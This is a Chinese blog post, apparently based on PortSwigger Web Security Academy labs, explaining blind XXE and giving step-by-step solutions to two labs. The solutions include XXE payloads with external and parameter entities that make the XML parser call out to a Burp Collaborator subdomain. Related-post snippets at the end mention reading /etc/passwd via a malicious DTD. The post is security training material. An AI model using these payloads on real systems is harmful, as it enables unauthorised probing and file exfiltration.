Lab: Blind XXE with out-of-band interaction | Lab: Blind XXE with out-of-band interaction via XML pa...

最新推荐文章于 2024-03-03 02:02:45 发布
最新推荐文章于 2024-03-03 02:02:45 发布
阅读量311 收藏
点赞数
文章标签: java python linux nginx 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793644
版权

什么是盲XXE?

当应用程序容易受到XXE 注入但不返回其响应中任何定义的外部实体的值时,就会出现盲 XXE 漏洞。这意味着直接检索服务器端文件是不可能的,因此盲 XXE 通常比常规 XXE 漏洞更难被利用。

有两种广泛的方法可以找到和利用盲 XXE 漏洞:

您可以触发带外网络交互,有时会在交互数据中泄露敏感数据。
您可以通过错误消息包含敏感数据的方式触发 XML 解析错误。

使用带外 ( OAST ) 技术检测盲 XXE

您通常可以使用与XXE SSRF 攻击相同的技术检测盲 XXE,但会触发与您控制的系统的带外网络交互。例如,您可以按如下方式定义外部实体:

]>

然后,您将在 XML 内的数据值中使用定义的实体。

此 XXE 攻击会导致服务器向指定的 URL 发出后端 HTTP 请求。攻击者可以监控由此产生的 DNS 查找和 HTTP 请求,从而检测到 XXE 攻击是否成功。

有时,由于应用程序的某些输入验证或正在使用的 XML 解析器的某些强化,使用常规实体的 XXE 攻击会被阻止。在这种情况下,您或许可以改用 XML 参数实体。XML 参数实体是一种特殊的 XML 实体,只能在 DTD 中的其他地方引用。就目前而言,您只需要知道两件事。首先,XML 参数实体的声明包括实体名称前的百分比字符:

其次,使用百分比字符而不是通常的与号来引用参数实体:

%myparameterentity;

这意味着您可以通过 XML 参数实体使用带外检测来测试盲 XXE,如下所示:

%xxe; ]>

这个 XXE 负载声明了一个被调用的 XML 参数实体xxe,然后在 DTD 中使用该实体。这将导致对攻击者的域进行 DNS 查找和 HTTP 请求,从而验证攻击是否成功。

靶场1

该实验室具有“检查股票”功能,可解析 XML 输入但不显示结果。

您可以通过触发与外部域的带外交互来检测盲 XXE漏洞。

为了解决实验室问题,使用外部实体使 XML 解析器向 Burp Collaborator 发出 DNS 查找和 HTTP 请求。

解决方案

  • 访问产品页面,单击“检查库存”并拦截Burp Suite Professional 中生成的 POST 请求。
  • 转到 Burp 菜单,然后启动Burp Collaborator 客户端。
  • 单击“复制到剪贴板”将唯一的 Burp Collaborator 负载复制到剪贴板。让 Burp Collaborator 客户端窗口保持打开状态。
  • 在 XML 声明和stockCheck元素之间插入以下外部实体定义,但在指示的地方插入 Burp Collaborator 子域:
  • <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net"> ]>
  • 将productId数字替换为对外部实体的引用:&xxe;
  • 返回 Burp Collaborator 客户端窗口,然后单击“Poll now”。如果您没有看到列出的任何交互,请等待几秒钟,然后重试。您应该会看到一些由应用程序启动的 DNS 和 HTTP 交互,这些交互是您的负载的结果。image

靶场2

该实验室具有“检查库存”功能,可解析 XML 输入,但不显示任何意外值,并阻止包含常规外部实体的请求。

为了解决实验室问题,使用参数实体让 XML 解析器向 Burp Collaborator 发出 DNS 查找和 HTTP 请求。

笔记
为了防止 Academy 平台被用来攻击第三方,我们的防火墙会阻止实验室与任意外部系统之间的交互。要解决实验室,您必须使用 Burp Collaborator 的默认公共服务器 ( burpcollaborator.net)。

解决方案

  • 访问产品页面,单击“检查库存”并拦截Burp Suite Professional 中生成的 POST 请求。
  • 转到 Burp 菜单,然后启动Burp Collaborator 客户端。
  • 单击“复制到剪贴板”将唯一的 Burp Collaborator 负载复制到剪贴板。让 Burp Collaborator 客户端窗口保持打开状态。
  • 在 XML 声明和stockCheck元素之间插入以下外部实体定义,但在指示的地方插入 Burp Collaborator 子域:
  • <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net"> %xxe; ]>
  • 返回 Burp Collaborator 客户端窗口,然后单击“Poll now”。如果您没有看到列出的任何交互,请等待几秒钟,然后重试。您应该会看到一些由应用程序启动的 DNS 和 HTTP 交互,这些交互是您的负载的结果。
Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
XML外部实体注入(XXE)
web1的博客
09-08 474
关键利用点:外部实体 XML是什么? XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的义的 xxe 实体进行了引用 相关实验 1、利用外部实体来检索文件 1.1 访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。 1.2 在 XML 声明和stockCheck元素之间插入以下外部实体定义: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "fil
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到sitemap后就可以对相应可疑站点进行测试,由于该靶场为xxe漏洞靶场,找到对应的登录页面抓包进行构造payload进行测试,其中具体构造payload并找到对应flag见pdf所示。 资源使用人群:前后端有一定了解,具备一些安全方面知识,但不多,保姆级教程,只要你想学就能学会。 工具:忍者渗透测试系统【burpsuite,nmap,base32解密,php在线运行环境,base64解密,cmd5在线平台】
Lab: Blind SQL injection with out-of-band interaction:利用外带交互的注(半成品)
Zeker62的博客
08-18 391
靶场内容: This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie. The SQL query is executed asynchronously and has no effect on the app
Lab: Exploiting blind XXE to retrieve data via error messages:利用XXE通过错误消息检索数据...
Zeker62的博客
08-26 158
该实验室具有“检查库存”功能,可解析 XML 输入但不显示结果。 要解决该实验,请使用外部 DTD 触发显示/etc/passwd文件内容的错误消息。 该实验室包含指向不同域上的漏洞利用服务器的链接,您可以在其中托管恶意 DTD。 单击“转到漏洞利用服务器”并将以下恶意 DTD 文件保存在您的服务器上: 导入时,此页面会将其内容读入/etc/passwdfile实体,然后尝试在文件路径中使用该...
(翻译)一种xxe打的骚姿势,通过在上传的文件中得到结果
qq_36093477的博客
09-26 2453
背景 在之前的报道中,我们了解了很多关系在访问者浏览器执行代码;反射的xss和储存的xss。此外,我们快速查看配置错误的服务器设置和打开重定向。 今天我们将仔细研究从服务器窃取私人文件。 挑选一个目标 一如既往,我们需要一个好的目标。一个在荷兰的最大的电子商务网站 Bol.com。他们处理我的开放重定向错误报告的方式非常好。快速回复,正确修复并始终向我发送更新。没有麻烦,没有NDA,快乐的语气。公...
【技巧总结】理解XXE从基础到
weixin_30871293的博客
12-10 359
原文:http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html 这篇文章中将讨论以下问题。 XXE是什么? 如何确认XXE? 如何利用基本XXE? 如何XXE? 以及XXE有效载荷的备选方案。 首先要了解一些基本的关键词。 实体:实体引用充当缩写或可以在外部位置找到的数据。...
HIN2xxE系列RS-232收发器的原理及应用
12-13
摘要:HIN2xxE系列是由+5V单电源供电的高速RS-232收发电路,符合EIA RS-232C和V.28规范,以电源功耗低为显著特点,广泛应用于ISDN和高速调制解调器,尤其是电池供电系统中。文中主要介绍HIN2xxE系列电路的原理、特性...
xxe-injection-payload-list::bullseye:XML外部实体(XXE)注入有效负载列表
02-06
xxe-injection-payload-list::bullseye:XML外部实体(XXE)注入有效负载列表
Zebra:Z用于Zimbra协作的XXE工具8.7.X <8.7.11p10
04-17
:zebra: 斑马 :zebra: 用于Zimbra协作的XXE工具8.7.X <8.7.11p10 :high_voltage: 安装/入门有关如何安装和使用Zebra的快速指南。 1. Clone the repository with git clone https://github.com/oppsec/Zebra.git2....
XML schema 编辑工具 xxe-perso-4_9_1
11-19
XML schema 编辑工具 xxe-perso-4_9_1
xxe漏洞原理与利用
最新发布
Au_Wind的博客
03-03 845
xxe漏洞原理与应用
BurpSuite靶场系列之OS命令注入
weixin_51387754的博客
10-21 565
目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。
burpsuite靶场——XXE
qq_61768489的博客
12-26 1006
XML全称是可扩展标记语言,是用来存储和传输数据的一种数据格式,结构上和HTML类似,但是XML使用的是自定义的标签名,XML在Web早期中比较流行,现在开始流行JSON格式的数据了。XML实体是一种表示数据项的方式,比如用实体< and >表示符号,XML用实体来表示XML标签。DTD全称是document type definition,其可以定义XML文档的结构、它可以包含的数据类型和其他项目。DTD在XML文档开头以可选DOCTYPE节点中声明。
XXE – Things Are Getting Out of Band
weixin_30553065的博客
01-06 179
This isn’t anything new however has been a long time in writing as I’ve been playing around with things! It is more my take on how to do these types of attacks and how I’ve found different tools t...
XXE(外部实体注入)| PortSwigger(burpsuite官方靶场)| Part 2
bin789456的博客
03-03 538
Blind XXE with out-of-band interaction via XML parameter entities(通过 XML 参数实体进行带外交互的 XXE
黑夜的猎杀-XXE
weixin_30699955的博客
01-06 248
在进入正文前,我想告诉大家,文章没有涉及任何XXE攻击的任何新技巧,这只是我遇到的一个案例,我只想分享给大家。 简短的摘要是非常重要的: 在对后台一无所知的情况下发现了一个XXE漏洞,该漏洞没有返回任何数据或者文件,这就是XXE 使用XXE进行基于报错的端口扫描 成功的外部交互正常进行 充分利用了XXE识别了后端系统的文件 身为渗透测试人员,我每天都的学习都很充...
xxe的攻击及防御
土拨鼠挖洞中的博客
06-30 6531
xml文档的基础组成XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素; DTD实体DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。 实体又分为一般实体和参数实体1,一般实体的声明语法:&lt;!ENTITY实体名 "实...
XXE的理解与绕过
weixin_50464560的博客
11-30 1519
转载至https://www.freebuf.com/articles/web/291094.html 前置知识XXE如何理解?它是可扩展标记语言 ( XML) 用于存储和传输数据。通常始于异步JavaScript和XML技术(ajax技术):网页应用能够快速地将增量更新呈现在用户界面上,而不需要重载(刷新)整个页面。目前JSON的使用比XML更加普遍。JSON和XML都被用于在Ajax模型中的XML技术。这种标记语言允许开发人员定义和表示任意数据结构的HTML。以下为定义属性和值的Security Ass
利用Blind XXE Getshell(Java网站)
谢公子的博客
03-17 3323
这是一道类似CTF的题目。话不多说 访问链接,如下。于是随便输入任意数字,点击Create Account 抓包,发现是XML提交的格式。于是乎想到了XXE漏洞 测试是否能读取文件,发现其不回显数据,于是只能利用Blind XXE攻击手法。 Blind XXE读取任意文件Getshell 首先,在我们的VPS上建立一个xml.dtd文件,内容如下。然后建立起一个HTTP服务,...
设置reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 能防止XXE攻击吗
07-15
是的,设置 `reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);` 可以防止 XXEXML External Entity)攻击。 XXE攻击是一种利用XML解析器的漏洞,通过在XML文档中插入恶意实体引用或外部实体引用,攻击者可以读取敏感文件、执行远程代码等。通过禁用DTD(Document Type Definition)处理,可以有效地防止XXE攻击。 在Java中,使用 `javax.xml.parsers.DocumentBuilderFactory` 来创建XML解析器,然后使用 `javax.xml.parsers.DocumentBuilder` 来解析XML文档。要防止XXE攻击,可以在创建 `DocumentBuilderFactory` 对象后设置相应的特性。 以下是一个示例代码片段,展示了如何设置防止XXE攻击的特性: ```java import javax.xml.parsers.DocumentBuilder; import javax.xml.parsers.DocumentBuilderFactory; public class Main { public static void main(String[] args) { try { DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); DocumentBuilder builder = factory.newDocumentBuilder(); // 继续处理你的XML文档... } catch (Exception e) { e.printStackTrace(); } } } ``` 通过设置上述特性,XML解析器将拒绝处理DTD声明,从而有效地防止了XXE攻击。 请注意,在实际开发中,除了禁用DTD处理,还应该采取其他安全措施,如输入验证、使用白名单过滤等,以确保应用程序的安全性。 希望这可以回答你的问题。如果还有其他疑问,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值